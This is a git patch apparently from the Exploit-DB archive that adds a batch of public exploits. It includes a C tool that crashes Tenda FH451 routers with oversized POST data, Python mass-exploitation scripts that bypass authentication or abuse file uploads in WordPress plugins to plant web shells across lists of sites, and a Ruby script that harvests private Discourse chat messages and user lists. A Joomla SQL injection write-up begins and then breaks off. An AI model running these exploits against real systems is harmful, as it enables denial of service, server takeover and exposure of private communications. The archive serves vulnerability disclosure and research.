From 599853959f025a25ec375c6a532eec58c90790b7 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Wed, 23 Jul 2025 00:16:47 +0000 Subject: [PATCH] DB: 2025-07-23 13 changes to exploits/shellcodes/ghdb Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow Discourse 3.1.1 - Unauthenticated Chat Message Access Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE Simple File List WordPress Plugin 4.2.2 - File Upload to RCE Joomla JS Jobs plugin 1.4.2 - SQL injection LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Department Assignment Alias Nick Field LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Facebook Integration Page Name Field LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Personal Canned Messages LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Telegram Bot Username LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS) --- exploits/multiple/remote/52374.c | 381 +++++++++++++++++++ exploits/multiple/webapps/52370.py | 90 +++++ exploits/multiple/webapps/52371.py | 103 ++++++ exploits/multiple/webapps/52375.rb | 565 +++++++++++++++++++++++++++++ exploits/php/webapps/52373.txt | 65 ++++ exploits/php/webapps/52376.txt | 32 ++ exploits/php/webapps/52377.txt | 33 ++ exploits/php/webapps/52378.txt | 35 ++ exploits/php/webapps/52379.txt | 32 ++ exploits/php/webapps/52380.txt | 30 ++ exploits/php/webapps/52381.txt | 34 ++ exploits/windows/remote/52372.txt | 235 ++++++++++++ files_exploits.csv | 12 + 13 files changed, 1647 insertions(+) create mode 100644 exploits/multiple/remote/52374.c create mode 100755 exploits/multiple/webapps/52370.py create mode 100755 exploits/multiple/webapps/52371.py create mode 100755 exploits/multiple/webapps/52375.rb create mode 100644 exploits/php/webapps/52373.txt create mode 100644 exploits/php/webapps/52376.txt create mode 100644 exploits/php/webapps/52377.txt create mode 100644 exploits/php/webapps/52378.txt create mode 100644 exploits/php/webapps/52379.txt create mode 100644 exploits/php/webapps/52380.txt create mode 100644 exploits/php/webapps/52381.txt create mode 100644 exploits/windows/remote/52372.txt diff --git a/exploits/multiple/remote/52374.c b/exploits/multiple/remote/52374.c new file mode 100644 index 000000000..aee470f54 --- /dev/null +++ b/exploits/multiple/remote/52374.c @@ -0,0 +1,381 @@ +/* + * Title : Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow + * Author : Byte Reaper + * Telegram : @ByteReaper0 + * CVE : CVE-2025-7795 + * Vulnerability : Buffer Overflow + * Description : + * A buffer overflow vulnerability affecting certain Tenda routers, + * exploitable via an unauthenticated POST request to an unprotected endpoint, leading to service crash. + */ + +#include +#include +#include +#include "argparse.h" +#include +#include +#include +#include + +#define FULL_URL 2500 +#define POST_DATA 10000 + +const char *targetUrl = NULL; +const char *targetip = NULL; +int selectIp = 0; +int selectUrl = 0; +int verbose = 0; +int showOne = 0; +char postData[POST_DATA]; + +struct Mem +{ + char *buffer; + size_t len; +}; + +size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) +{ + size_t total = size * nmemb; + struct Mem *m = (struct Mem *)userdata; + char *tmp = realloc(m->buffer, m->len + total + 1); + if (!tmp) return 0; + m->buffer = tmp; + memcpy(&(m->buffer[m->len]), ptr, total); + m->len += total; + m->buffer[m->len] = '\0'; + return total; +} + +void pingPacket() +{ + int pid = fork(); + printf("\n============================================== [Ping] ==============================================\n"); + if (pid < 0) + { + perror("\e[1;31m[-] Fork Failed!\e[0m"); + exit(1); + } + if (pid == 0) + { + printf("\e[1;32m[+] Child Process (Ping) -> PID: %d\e[0m\n", + getpid()); + char *const argv[] = { "/bin/ping", + "-c", + "3", + (char *)targetip, + NULL }; + char *const envp[] = { NULL }; + __asm__ volatile + ( + "mov $59, %%rax\n\t" + "mov %[prog], %%rdi\n\t" + "mov %[argv], %%rsi\n\t" + "mov %[envp], %%rdx\n\t" + "syscall\n\t" + "mov $60, %%rax\n\t" + "xor %%rdi, %%rdi\n\t" + "syscall\n\t" + : + : [prog] "r" (argv[0]), + [argv] "r" (argv), + [envp] "r" (envp) + : "rax", "rdi", "rsi", "rdx" + ); + } + else + { + printf("\e[1;32m[+] Main PID : %d\e[0m\n", + getpid()); + int status; + waitpid(pid, + &status, + 0); + if (WIFEXITED(status)) + { + int code = WEXITSTATUS(status); + printf("\e[1;33m[+] Ping exited with code: %d\e[0m\n", + code); + if (code == 0) + { + printf("\e[1;31m[-] Successfully confirmed connection via ping!\e[0m\n"); + printf("\e[1;31m[-] The server is still working, please try again!\n\e[0m"); + } + else + { + printf("\e[1;34m[+] The server is not responding to the ping request!\e[0m\n"); + printf("\e[1;34m[+] CVE-2025-7795: Vulnerability confirmed! Server is down.\e[0m\n"); + } + } + } + printf("\n============================================================================================\e[0m\n"); +} + +void sendRequest() +{ + CURL *c = curl_easy_init(); + CURLcode res; + char full[FULL_URL]; + struct Mem response = {NULL, 0}; + if (!c) { + printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n"); + exit(EXIT_FAILURE); + } + if (targetip) selectIp = 1; + if (targetUrl) selectUrl = 1; + if (selectIp) + { + snprintf(full, + sizeof(full), + "http://%s/goform/fromP2pListFilter", + targetip); + } + if (selectUrl) + { + snprintf(full, + sizeof(full), + "%s/goform/fromP2pListFilter", + targetUrl); + } + int rounds = 5; + int baseLen = 3500, step = 1000; + showOne = 1; + for (int i = 0; i < rounds; i++) + { + int len = baseLen + i * step; + if (len + 6 >= sizeof(postData)) break; + snprintf(postData, sizeof(postData), "list="); + memset(postData + 5, 'A', len); + postData[5 + len] = '\0'; + printf("\e[1;34m[%d] Iteration %d - Length: %d\e[0m\n", + i+1, + i+1, + len); + if (verbose) + { + printf("\e[1;35m\n====================================================================[Post Data] ====================================================================\e[0m\n"); + printf("%s\e[0m\n\n", postData); + printf("\e[1;35m====================================================================[Post Data] ====================================================================\e[0m\n"); + } + + curl_easy_reset(c); + curl_easy_setopt(c, + CURLOPT_URL, + full); + curl_easy_setopt(c, + CURLOPT_ACCEPT_ENCODING, + ""); + curl_easy_setopt(c, + CURLOPT_FOLLOWLOCATION, + 1L); + curl_easy_setopt(c, + CURLOPT_POST, + 1L); + curl_easy_setopt(c, + CURLOPT_POSTFIELDS, + postData); + curl_easy_setopt(c, + CURLOPT_POSTFIELDSIZE, + (long)strlen(postData)); + curl_easy_setopt(c, + CURLOPT_WRITEFUNCTION, + write_cb); + curl_easy_setopt(c, + CURLOPT_WRITEDATA, + &response); + curl_easy_setopt(c, + CURLOPT_CONNECTTIMEOUT, + 5L); + curl_easy_setopt(c, + CURLOPT_TIMEOUT, + 10L); + curl_easy_setopt(c, + CURLOPT_SSL_VERIFYPEER, + 0L); + curl_easy_setopt(c, + CURLOPT_SSL_VERIFYHOST, + 0L); + struct curl_slist *h = NULL; + h = curl_slist_append(h, + "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"); + h = curl_slist_append(h, + "Accept-Encoding: gzip, deflate, br"); + h = curl_slist_append(h, + "Accept-Language: en-US,en;q=0.5"); + h = curl_slist_append(h, + "Connection: keep-alive"); + h = curl_slist_append(h, + "Referer: http://example.com"); + h = curl_slist_append(h, + "Cache-Control: no-cache"); + h = curl_slist_append(h, + "Pragma: no-cache"); + curl_easy_setopt(c, CURLOPT_HTTPHEADER, h); + if (verbose) curl_easy_setopt(c, CURLOPT_VERBOSE, 1L); + + char *encode1 = curl_easy_escape(c, full, 0); + if (!encode1) + { + printf("\e[1;31m[-] URL encoding failed for payload\e[0m\n"); + exit(EXIT_FAILURE); + } + if (verbose && showOne) + { + printf("\e[1;37m========================================="); + if (selectUrl) printf("\e[1;37m[+] Input Url : %s\e[0m\n[+] Encode Url : %s\e[0m\n[+] full format Url : %s\e[0m\n", + targetUrl, + encode1, + full); + if (selectIp) printf("\e[1;37m[+] Input Ip : %s\e[0m\n[+] full format Url : %s\e[0m\n", + targetip, + full); + printf("========================================="); + showOne = 0; + } + res = curl_easy_perform(c); + curl_slist_free_all(h); + curl_free(encode1); + if (response.buffer) + { + free(response.buffer); + response.buffer = NULL; + response.len = 0; + } + if (res == CURLE_OK) + { + long httpCode = 0; + printf("\e[1;36m[+] Request sent successfully\e[0m\n"); + curl_easy_getinfo(c, CURLINFO_RESPONSE_CODE, + &httpCode); + printf("\e[1;32m[+] Http Code Response : %ld\e[0m\n", + httpCode); + if (httpCode >= 200 && httpCode < 300) + { + printf("\e[1;31m[-] The server was not affected, still working !\n"); + printf("\e[1;33m-------------------------------- Response Server --------------------------------\e[0m\n"); + printf("%s\e[0m\n", + response.buffer); + printf("\e[1;33m-----------------------------------------------------------------------------------\e[0m\n"); + } + else + { + printf("\e[1;34m[+] Negative server response. I started trying to confirm the connection...\e[0m\n"); + printf("[+] Run Command Ping For Check Connection : \e[0m\n"); + if (selectIp) pingPacket(); + else printf("[-] Error Run Command Ping for URl !\e[0m\n[-] Please Enter Target Ip for Check Connection !\e[0m\n"); + } + } + else + { + printf("[-] Error Send Request, Please Check Your Connection !\e[0m\n"); + printf("[-] Error : %s\n", curl_easy_strerror(res)); + } + } + free(response.buffer); + curl_easy_cleanup(c); +} + +int main(int argc, + const char **argv) +{ + printf( + "\e[1;31m" + "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖ \n" + "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌ ▌▙▌▙▖ \n" + "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌ ▌▄▌▄▌ \n" + " \e[1;37mByte Reaper\e[0m\n" + ); + printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------\e[0m\n"); + if (getuid() != 0) + { + printf("===================================================\e[0m\n"); + printf("[-] Not running as root. Trying with sudo...\e[0m\n"); + + char *args[] = {(char*)"sudo", + (char*)"./exploit", + NULL}; + execvp("sudo", args); + + perror("[-] Error Run Exploit in Root !"); + __asm__ volatile + ( + "mov $0x3C, %%rax\n\t" + "xor %%rdi, %%rdi\n\t" + "syscall\n\t" + : + : + : "rdi" + ); + } + printf("\e[1;36m[+] Running as root! Exploit continues...\e[0m\n"); + printf("===================================================\e[0m\n"); + + struct argparse_option options[] = + { + OPT_HELP(), + OPT_STRING('i', + "ip", + &targetip, + "Enter Target IP"), + OPT_STRING('u', + "url", + &targetUrl, + "Enter Target URL"), + OPT_BOOLEAN('v', + "verbose", + &verbose, + "Verbose Mode"), + OPT_END(), + }; + + struct argparse argparse; + argparse_init(&argparse, + options, + NULL, + 0); + argparse_parse(&argparse, + argc, + argv); + + if (!targetip && !targetUrl) + { + printf("\e[1;33m[-] Please Enter Target IP OR URl !\e[0m\n"); + printf("\e[1;33m[!] Exemple : ./exploit -u http://ROUTER_IP\e[0m\n"); + printf("[+] OR \n"); + printf("\e[1;33m[!] Exemple : ./exploit -i ROUTER_IP\e[0m\n"); + __asm__ volatile( + "xor %%rdi, %%rdi\n\t" + "mov $0x3C, %%rax\n\t" + "1:\n\t" + "syscall\n\t" + : + : + : "rax", "rdi", "rsi" + ); + } + if (targetip && targetUrl) + { + printf("[+] Please Enter Traget URL OR Traget Ip address, Exit...\e[0m\n"); + __asm__ volatile + ( + "mov $0x3C, %%rax\n\t" + "xor %%rdi, %%rdi\n\t" + "syscall\n\t" + : + : + :"rdi" + ); + } + if (selectIp) + { + sendRequest(); + } + else + { + sendRequest(); + } + + + return 0; +} \ No newline at end of file diff --git a/exploits/multiple/webapps/52370.py b/exploits/multiple/webapps/52370.py new file mode 100755 index 000000000..41ed38401 --- /dev/null +++ b/exploits/multiple/webapps/52370.py @@ -0,0 +1,90 @@ +# Exploit Title: Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE +# Google Dork: inurl:/wp-content/plugins/pie-register/ +# Date: 2025-07-09 +# Exploit Author: Md Amanat Ullah (xSwads) +# Vendor Homepage: https://wordpress.org/plugins/pie-register/ +# Software Link: +https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip +# Version: <= 3.7.1.4 +# Tested on: Ubuntu 22.04 +# CVE: CVE-2025-34077 + +#!/usr/bin/env python3 +import requests +import zipfile +import io +import sys +from concurrent.futures import ThreadPoolExecutor, as_completed +from colorama import Fore, Style, init +from threading import Lock +init(autoreset=True) + +SHELL_PHP = "" +PLUGIN_DIR = "evilplugin" +ZIP_NAME = "evilplugin.zip" +SHELL_FILE = "shell.php" +OUTPUT_FILE = "Shells.txt" +HEADERS = {'User-Agent': 'Mozilla/5.0'} +TIMEOUT = 10 +lock = Lock() + +def FilterURLS(site): + site = site.strip() + if not site.startswith(('http://', 'https://')): + site = 'http://' + site + if not site.endswith('/'): + site += '/' + return site + +def make_shell_zip(): + buf = io.BytesIO() + with zipfile.ZipFile(buf, 'w') as z: + z.writestr(f"{PLUGIN_DIR}/{PLUGIN_DIR}.php", "") + z.writestr(f"{PLUGIN_DIR}/{SHELL_FILE}", SHELL_PHP) + buf.seek(0) + return buf + +def exploit(target): + target = FilterURLS(target) + session = requests.Session() + data = {"social_site": "true", "user_id_social_site": "1"} + try: + r = session.post(f"{target}?pr_social_login=1", data=data, headers=HEADERS, timeout=TIMEOUT) + except: + print(f"{Fore.RED}[Failed] - {target}") + return + + if not session.cookies: + print(f"{Fore.RED}[Failed] - {target}") + return + files = {"pluginzip": (ZIP_NAME, make_shell_zip(), "application/zip")} + try: + upload = session.post(f"{target}wp-admin/plugin-install.php?upload", files=files, headers=HEADERS, timeout=TIMEOUT) + except: + print(f"{Fore.RED}[Failed] - {target}") + return + + if "Plugin installed successfully" in upload.text: + shell_url = f"{target}wp-content/plugins/{PLUGIN_DIR}/{SHELL_FILE}" + print(f"{Fore.GREEN}[Exploited] - {shell_url}") + with lock: + with open(OUTPUT_FILE, "a") as f: + f.write(shell_url + "\n") + else: + print(f"{Fore.RED}[Failed] - {target}") + +def main(targets_file): + with open(targets_file, "r") as f: + targets = [line.strip() for line in f if line.strip()] + + with ThreadPoolExecutor(max_workers=100) as executor: + futures = [executor.submit(exploit, target) for target in targets] + for _ in as_completed(futures): + pass + +if __name__ == "__main__": + if len(sys.argv) != 2: + print(f"Usage: {sys.argv[0]} list.txt") + sys.exit(1) + + main(sys.argv[1]) \ No newline at end of file diff --git a/exploits/multiple/webapps/52371.py b/exploits/multiple/webapps/52371.py new file mode 100755 index 000000000..c065d4eac --- /dev/null +++ b/exploits/multiple/webapps/52371.py @@ -0,0 +1,103 @@ +# Exploit Title: Simple File List WordPress Plugin 4.2.2 - File Upload to RCE +# Google Dork: inurl:/wp-content/plugins/simple-file-list/ +# Date: 2025-07-15 +# Exploit Author: Md Amanat Ullah (xSwads) +# Vendor Homepage: https://wordpress.org/plugins/simple-file-list/ +# Software Link: +https://downloads.wordpress.org/plugin/simple-file-list.4.2.2.zip +# Version: <= 4.2.2 +# Tested on: Ubuntu 22.04 +# CVE: CVE-2020-36847 + +#!/usr/bin/env python3 +import requests +import sys, os +from concurrent.futures import ThreadPoolExecutor, as_completed +from urllib.parse import urljoin +from colorama import Fore, init + +init(autoreset=True) + +HEADERS = {'User-Agent': 'Mozilla/5.0'} +PHP_PAYLOAD = "" +UPLOAD_PATH = "wp-content/plugins/simple-file-list/ee-upload-engine.php" +RENAME_PATH = "wp-content/plugins/simple-file-list/ee-file-engine.php" +UPLOAD_FOLDER = "wp-content/uploads/simple-file-list/" + +def FilterURLS(site): + site = site.strip() + if not site.startswith(('http://', 'https://')): + site = 'http://' + site + if not site.endswith('/'): + site += '/' + return site + +def upload_payload(base): + upload_url = urljoin(base, UPLOAD_PATH) + try: + files = {'file': ('pwn.png', PHP_PAYLOAD, 'image/png')} + r = requests.post(upload_url, files=files, headers=HEADERS, timeout=10, verify=False) + r.raise_for_status() + result = r.json() + return result.get('file') + except Exception: + return None + +def rename_payload(base, filename): + rename_url = urljoin(base, RENAME_PATH) + try: + new_name = filename[:-4] + '.php' + data = {'oldFile': filename, 'newFile': new_name} + r = requests.post(rename_url, data=data, headers=HEADERS, timeout=10, verify=False) + r.raise_for_status() + result = r.json() + return result.get('newFile') + except Exception: + return None + +def exploit(site): + base = FilterURLS(site) + try: + filename = upload_payload(base) + if not filename: + print(Fore.RED + f"[Failed] - {site}") + return + + newfile = rename_payload(base, filename) + if not newfile: + print(Fore.RED + f"[Failed] - {site}") + return + + shell_url = urljoin(base, UPLOAD_FOLDER + newfile) + r = requests.get(shell_url, headers=HEADERS, timeout=10, verify=False) + if r.status_code == 200: + print(Fore.GREEN + f"[Exploited] - {shell_url}") + with open("shells_found.txt", "a") as f: + f.write(shell_url + "\n") + else: + print(Fore.RED + f"[Failed] - {site}") + + except Exception: + print(Fore.RED + f"[Failed] - {site}") + +def main(): + if len(sys.argv) != 2: + print(f"Usage: {sys.argv[0]} list.txt") + sys.exit(1) + + targets_file = sys.argv[1] + if not os.path.isfile(targets_file): + print(f"File {targets_file} not found.") + sys.exit(1) + + with open(targets_file) as f: + targets = [line.strip() for line in f if line.strip()] + + with ThreadPoolExecutor(max_workers=100) as executor: + futures = [executor.submit(exploit, target) for target in targets] + for _ in as_completed(futures): + pass + +if __name__ == "__main__": + requests.packages.urllib3.disable_warnings() + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52375.rb b/exploits/multiple/webapps/52375.rb new file mode 100755 index 000000000..3eea5c7a1 --- /dev/null +++ b/exploits/multiple/webapps/52375.rb @@ -0,0 +1,565 @@ +#!/usr/bin/env ruby +# Title : Discourse 3.1.1 - Unauthenticated Chat Message Access +# CVE-2023-45131 +# CVSS: 7.5 (High) +# Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2 +# Author ibrahimsql @ https://twitter.com/ibrahmsql +# Date: 2023-12-14 + +require 'net/http' +require 'uri' +require 'json' +require 'openssl' +require 'base64' + +class CVE202345131 + def initialize(target_url) + @target_url = target_url.chomp('/') + @results = [] + @message_bus_client_id = nil + @csrf_token = nil + end + + def run_exploit + puts "\n[*] Testing CVE-2023-45131: Discourse Unauthenticated Chat Message Access" + puts "[*] Target: #{@target_url}" + puts "[*] CVSS Score: 7.5 (High)" + puts "[*] Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2\n" + + # Test MessageBus access + test_messagebus_access + test_chat_channel_enumeration + test_private_message_access + test_real_time_monitoring + test_message_history_access + test_user_enumeration_via_chat + + generate_report + @results + end + + private + + def test_messagebus_access + puts "[*] Testing MessageBus unauthenticated access..." + + begin + # Get MessageBus client ID + uri = URI("#{@target_url}/message-bus/poll") + + response = make_request(uri, 'GET') + + if response && response.code == '200' + begin + data = JSON.parse(response.body) + if data.is_a?(Array) && !data.empty? + @message_bus_client_id = extract_client_id(response) + + @results << { + vulnerability: "MessageBus Access", + severity: "High", + description: "Unauthenticated access to MessageBus endpoint confirmed", + impact: "Can monitor real-time messages and notifications", + client_id: @message_bus_client_id + } + puts "[+] MessageBus access confirmed - Client ID: #{@message_bus_client_id}" + return true + end + rescue JSON::ParserError + # Try alternative endpoints + test_alternative_messagebus_endpoints + end + end + rescue => e + puts "[!] Error testing MessageBus access: #{e.message}" + end + + false + end + + def test_alternative_messagebus_endpoints + puts "[*] Testing alternative MessageBus endpoints..." + + endpoints = [ + "/message-bus/poll", + "/message-bus/subscribe", + "/message-bus/diagnostics", + "/message-bus/long-poll" + ] + + endpoints.each do |endpoint| + begin + uri = URI("#{@target_url}#{endpoint}") + response = make_request(uri, 'GET') + + if response && response.code == '200' + if response.body.include?('message-bus') || response.body.include?('clientId') + @results << { + vulnerability: "Alternative MessageBus Endpoint", + severity: "Medium", + endpoint: endpoint, + description: "Alternative MessageBus endpoint accessible", + impact: "Potential message monitoring capability" + } + puts "[+] Alternative endpoint accessible: #{endpoint}" + end + end + rescue => e + puts "[!] Error testing endpoint #{endpoint}: #{e.message}" + end + end + end + + def test_chat_channel_enumeration + puts "[*] Testing chat channel enumeration..." + + return unless @message_bus_client_id + + begin + # Try to enumerate chat channels + uri = URI("#{@target_url}/message-bus/poll") + + # Subscribe to chat channels + data = { + '/chat/new-messages' => -1, + '/chat/channel-status' => -1, + '/chat/user-tracking' => -1, + 'clientId' => @message_bus_client_id + } + + response = make_request(uri, 'POST', data) + + if response && response.code == '200' + begin + messages = JSON.parse(response.body) + + if messages.is_a?(Array) && !messages.empty? + chat_channels = extract_chat_channels(messages) + + if !chat_channels.empty? + @results << { + vulnerability: "Chat Channel Enumeration", + severity: "High", + channels: chat_channels, + description: "Enumerated accessible chat channels", + impact: "Can identify active chat channels and participants" + } + puts "[+] Chat channels enumerated: #{chat_channels.join(', ')}" + end + end + rescue JSON::ParserError => e + puts "[!] Error parsing chat channel response: #{e.message}" + end + end + rescue => e + puts "[!] Error enumerating chat channels: #{e.message}" + end + end + + def test_private_message_access + puts "[*] Testing private message access..." + + return unless @message_bus_client_id + + begin + # Try to access private messages + uri = URI("#{@target_url}/message-bus/poll") + + # Subscribe to private message channels + data = { + '/private-messages' => -1, + '/chat/private' => -1, + '/notification' => -1, + 'clientId' => @message_bus_client_id + } + + response = make_request(uri, 'POST', data) + + if response && response.code == '200' + begin + messages = JSON.parse(response.body) + + if messages.is_a?(Array) + private_messages = extract_private_messages(messages) + + if !private_messages.empty? + @results << { + vulnerability: "Private Message Access", + severity: "Critical", + messages: private_messages, + description: "Accessed private chat messages without authentication", + impact: "Complete breach of private communication confidentiality" + } + puts "[+] Private messages accessed: #{private_messages.length} messages found" + + # Log sample messages (redacted) + private_messages.first(3).each_with_index do |msg, idx| + puts " [#{idx + 1}] #{redact_message(msg)}" + end + end + end + rescue JSON::ParserError => e + puts "[!] Error parsing private message response: #{e.message}" + end + end + rescue => e + puts "[!] Error accessing private messages: #{e.message}" + end + end + + def test_real_time_monitoring + puts "[*] Testing real-time message monitoring..." + + return unless @message_bus_client_id + + begin + puts "[*] Monitoring for 10 seconds..." + + start_time = Time.now + monitored_messages = [] + + while (Time.now - start_time) < 10 + uri = URI("#{@target_url}/message-bus/poll") + + data = { + '/chat/new-messages' => 0, + 'clientId' => @message_bus_client_id + } + + response = make_request(uri, 'POST', data) + + if response && response.code == '200' + begin + messages = JSON.parse(response.body) + + if messages.is_a?(Array) && !messages.empty? + new_messages = extract_new_messages(messages) + monitored_messages.concat(new_messages) + end + rescue JSON::ParserError + # Continue monitoring + end + end + + sleep(1) + end + + if !monitored_messages.empty? + @results << { + vulnerability: "Real-time Message Monitoring", + severity: "High", + messages_count: monitored_messages.length, + description: "Successfully monitored real-time chat messages", + impact: "Can intercept live communications" + } + puts "[+] Real-time monitoring successful: #{monitored_messages.length} messages intercepted" + else + puts "[-] No real-time messages detected during monitoring period" + end + rescue => e + puts "[!] Error during real-time monitoring: #{e.message}" + end + end + + def test_message_history_access + puts "[*] Testing message history access..." + + begin + # Try to access message history through various endpoints + history_endpoints = [ + "/chat/api/channels", + "/chat/api/messages", + "/chat/history", + "/api/chat/channels.json" + ] + + history_endpoints.each do |endpoint| + uri = URI("#{@target_url}#{endpoint}") + response = make_request(uri, 'GET') + + if response && response.code == '200' + begin + data = JSON.parse(response.body) + + if data.is_a?(Hash) && (data['messages'] || data['channels'] || data['chat']) + @results << { + vulnerability: "Message History Access", + severity: "High", + endpoint: endpoint, + description: "Accessed chat message history without authentication", + impact: "Historical chat data exposure" + } + puts "[+] Message history accessible via: #{endpoint}" + end + rescue JSON::ParserError + # Check for HTML responses that might contain chat data + if response.body.include?('chat') && response.body.include?('message') + @results << { + vulnerability: "Message History Exposure", + severity: "Medium", + endpoint: endpoint, + description: "Chat-related content found in response", + impact: "Potential information disclosure" + } + puts "[+] Chat-related content found in: #{endpoint}" + end + end + end + end + rescue => e + puts "[!] Error testing message history access: #{e.message}" + end + end + + def test_user_enumeration_via_chat + puts "[*] Testing user enumeration via chat features..." + + begin + # Try to enumerate users through chat-related endpoints + user_endpoints = [ + "/chat/api/users", + "/chat/users.json", + "/api/chat/users", + "/chat/members" + ] + + user_endpoints.each do |endpoint| + uri = URI("#{@target_url}#{endpoint}") + response = make_request(uri, 'GET') + + if response && response.code == '200' + begin + data = JSON.parse(response.body) + + if data.is_a?(Hash) && (data['users'] || data['members']) + users = extract_users_from_chat(data) + + if !users.empty? + @results << { + vulnerability: "User Enumeration via Chat", + severity: "Medium", + endpoint: endpoint, + users_count: users.length, + sample_users: users.first(5), + description: "Enumerated chat users without authentication", + impact: "User information disclosure" + } + puts "[+] Users enumerated via #{endpoint}: #{users.length} users found" + end + end + rescue JSON::ParserError + # Continue with next endpoint + end + end + end + rescue => e + puts "[!] Error testing user enumeration: #{e.message}" + end + end + + def extract_client_id(response) + # Extract client ID from response headers or body + if response['X-MessageBus-Client-Id'] + return response['X-MessageBus-Client-Id'] + end + + # Try to extract from response body + begin + data = JSON.parse(response.body) + if data.is_a?(Hash) && data['clientId'] + return data['clientId'] + end + rescue JSON::ParserError + end + + # Generate a random client ID + SecureRandom.hex(16) + end + + def extract_chat_channels(messages) + channels = [] + + messages.each do |message| + if message.is_a?(Hash) + if message['channel'] && message['channel'].include?('/chat/') + channels << message['channel'] + elsif message['data'] && message['data'].is_a?(Hash) + if message['data']['channel_id'] + channels << "Channel #{message['data']['channel_id']}" + end + end + end + end + + channels.uniq + end + + def extract_private_messages(messages) + private_msgs = [] + + messages.each do |message| + if message.is_a?(Hash) + if message['channel'] && (message['channel'].include?('/private') || message['channel'].include?('/chat/private')) + private_msgs << { + channel: message['channel'], + data: message['data'], + timestamp: message['timestamp'] || Time.now.to_i + } + elsif message['data'] && message['data'].is_a?(Hash) + if message['data']['message'] || message['data']['content'] + private_msgs << { + content: message['data']['message'] || message['data']['content'], + user: message['data']['user'] || message['data']['username'], + timestamp: message['data']['timestamp'] || Time.now.to_i + } + end + end + end + end + + private_msgs + end + + def extract_new_messages(messages) + new_msgs = [] + + messages.each do |message| + if message.is_a?(Hash) && message['data'] + new_msgs << { + channel: message['channel'], + data: message['data'], + timestamp: Time.now.to_i + } + end + end + + new_msgs + end + + def extract_users_from_chat(data) + users = [] + + if data['users'] && data['users'].is_a?(Array) + data['users'].each do |user| + if user.is_a?(Hash) + users << { + username: user['username'], + id: user['id'], + name: user['name'] + } + end + end + elsif data['members'] && data['members'].is_a?(Array) + data['members'].each do |member| + if member.is_a?(Hash) + users << { + username: member['username'] || member['user'], + id: member['id'] || member['user_id'] + } + end + end + end + + users + end + + def redact_message(message) + if message.is_a?(Hash) + content = message[:content] || message['content'] || message[:data] || 'N/A' + user = message[:user] || message['user'] || 'Unknown' + "User: #{user}, Content: #{content.to_s[0..50]}..." + else + message.to_s[0..50] + "..." + end + end + + def make_request(uri, method = 'GET', data = nil, headers = {}) + begin + http = Net::HTTP.new(uri.host, uri.port) + http.use_ssl = (uri.scheme == 'https') + http.verify_mode = OpenSSL::SSL::VERIFY_NONE if http.use_ssl? + http.read_timeout = 10 + http.open_timeout = 10 + + request = case method.upcase + when 'GET' + Net::HTTP::Get.new(uri.request_uri) + when 'POST' + req = Net::HTTP::Post.new(uri.request_uri) + if data + if data.is_a?(Hash) + req.set_form_data(data) + else + req.body = data + req['Content-Type'] = 'application/json' + end + end + req + end + + # Set headers + request['User-Agent'] = 'Mozilla/5.0 (compatible; DiscourseMap/2.0)' + request['Accept'] = 'application/json, text/javascript, */*; q=0.01' + request['X-Requested-With'] = 'XMLHttpRequest' + headers.each { |key, value| request[key] = value } + + response = http.request(request) + return response + rescue => e + puts "[!] Request failed: #{e.message}" + return nil + end + end + + def generate_report + puts "\n" + "="*60 + puts "CVE-2023-45131 Exploitation Report" + puts "="*60 + puts "Target: #{@target_url}" + puts "Vulnerabilities Found: #{@results.length}" + + if @results.empty? + puts "[+] No chat message access vulnerabilities detected" + else + puts "\n[!] VULNERABILITIES DETECTED:" + @results.each_with_index do |result, index| + puts "\n#{index + 1}. #{result[:vulnerability]}" + puts " Severity: #{result[:severity]}" + puts " Description: #{result[:description]}" + puts " Impact: #{result[:impact]}" + + if result[:messages_count] + puts " Messages Found: #{result[:messages_count]}" + end + if result[:channels] + puts " Channels: #{result[:channels].join(', ')}" + end + if result[:endpoint] + puts " Endpoint: #{result[:endpoint]}" + end + end + + puts "\n[!] REMEDIATION:" + puts "1. Update Discourse to version 3.1.1 stable or 3.2.0.beta2 or later" + puts "2. Implement proper authentication for MessageBus endpoints" + puts "3. Review and restrict access to chat-related APIs" + puts "4. Monitor MessageBus access logs for suspicious activity" + puts "5. Consider disabling chat features if not required" + end + + puts "\n" + "="*60 + end +end + +# Run the exploit if called directly +if __FILE__ == $0 + if ARGV.length != 1 + puts "Usage: ruby #{$0} " + puts "Example: ruby #{$0} https://discourse.example.com" + exit 1 + end + + target_url = ARGV[0] + exploit = CVE202345131.new(target_url) + exploit.run_exploit +end \ No newline at end of file diff --git a/exploits/php/webapps/52373.txt b/exploits/php/webapps/52373.txt new file mode 100644 index 000000000..882e6e92c --- /dev/null +++ b/exploits/php/webapps/52373.txt @@ -0,0 +1,65 @@ +# Exploit Title: Joomla JS Jobs plugin 1.4.2 - SQL injection +# Google Dork: n/a +# Date: 07/07/2025 +# Exploit Author: Adam Wallwork +# Vendor Homepage: https://joomsky.com/ +# Demo: https://demo.joomsky.com/js-jobs/jm/free/ +# Software Link: https://extensions.joomla.org/extension/js-jobs/ +# Version: v1.4.2 +# Tested on: v1.4.2 + + +An SQL injection vulnerability exists in the JS Jobs extension (v1.4.2) via the 'cvid' parameter and is exploitable as the jobseeker user. + +To exploit this vulnerability login as the jobseeker user with default credentials (jobseeker:demo) and go to 'jobseeker-controlpanel >> My Stuff >> Newest Jobs >> Newest Jobs >> Apply Now >> Apply Now' and 